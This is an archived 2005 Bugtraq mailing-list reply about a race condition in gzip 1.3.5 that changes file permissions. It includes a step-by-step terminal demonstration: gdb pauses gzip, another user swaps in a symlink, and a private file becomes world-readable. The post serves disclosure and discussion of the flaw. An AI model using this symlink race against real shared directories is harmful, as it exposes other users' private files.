lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <20050413154049.GA30175@kitenet.net>
Date: Wed, 13 Apr 2005 11:40:49 -0400
From: Joey Hess <joeyh@...ian.org>
To: Martin Pitt <martin.pitt@...onical.com>
Cc: Imran Ghory <imranghory@...il.com>, bugtraq@...urityfocus.com,
	303927@...s.debian.org
Subject: Re: gzip TOCTOU file-permissions vulnerability

Martin Pitt wrote:
> Of course the file can be removed by other users after gunzip has
> finished, but that is not a gzip bug, but the result of the really
> dumb idea to have a group/world-writeable directory without the sticky
> bit.

It may be really dumb, but it's pretty common practice too.
Group-writable directories are often made setgid but I've never seen one
made sticky. There's probably a lot of documentation that presents this
as best practice if you trust your group members with access to files in
the directory, and likely none of it mentions this kind of security issue.

Just a few examples within the Debian project (since this is CCed to the
Debian bts):

joeyh@...dn:/var/lib/gforge/chroot/home/groups/d-i/htdocs>ls -ld .
drwxrwsr-x    4 dummy    d-i          4096 Jan 18 12:51 ./

joeyh@...ck:/org/cdimage.debian.org/www>ls -ld .
drwxrwsr-x    4 manty    debian-c     4096 Apr  7 09:11 ./

joeyh@...kel:/org/bugs.debian.org/spool>ls -ld .
drwxrwsr-x    4 debbugs  debbugs      4096 Apr 13 09:19 ./

(gzip is not typically ran in any of these directories AFAIK, FWIW).

> Maybe I understood you wrong, could you please give a small test case
> which describes the vulnerability exactly?

I'm a wimp, so I will use gdb instead of writing some real exploit to
win the race.

joey@...gon:~/tmp/gzip-1.3.5>chmod 777 .  
joey@...gon:~/tmp/gzip-1.3.5>echo secret > ~/secret
joey@...gon:~/tmp/gzip-1.3.5>chmod 400 ~/secret
joey@...gon:~/tmp/gzip-1.3.5>ls -l ~/secret 
-r--------  1 joey joey 7 Apr 13 11:32 /home/joey/secret
joey@...gon:~/tmp/gzip-1.3.5>gdb ./gzip
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) b copy_stat
Breakpoint 1 at 0x804ca19: file gzip.c, line 1725.
(gdb) run -9 COPYING
Starting program: /home/joey/tmp/gzip-1.3.5/gzip -9 COPYING

Breakpoint 1, copy_stat (ifstat=0x0) at gzip.c:1725
1725        if (decompress && time_stamp != 0 && ifstat->st_mtime != time_stamp) {
(gdb) 
zsh: suspended  gdb ./gzip
joey@...gon:~/tmp/gzip-1.3.5>ls -l COPYING.gz
-rw-------  1 joey joey 6853 Apr 13 11:28 COPYING.gz
joey@...gon:~/tmp/gzip-1.3.5>sudo su nobody
Password:
sh-3.00$ ln -s ~joey/secret COPYING.gz
sh-3.00$ cat COPYING.gz
cat: COPYING.gz: Permission denied
dragon% 
zsh: exit 1     sudo su nobody
joey@...gon:~/tmp/gzip-1.3.5>fg
[2]  - continued  gdb ./gzip
c
Continuing.

Program exited normally.
(gdb) quit
joey@...gon:~/tmp/gzip-1.3.5>ls -l ~/secret
-r--r--r--  1 joey joey 7 Jan 12  1999 /home/joey/secret

-- 
see shy jo

Download attachment "signature.asc" of type "application/pgp-signature" (190 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ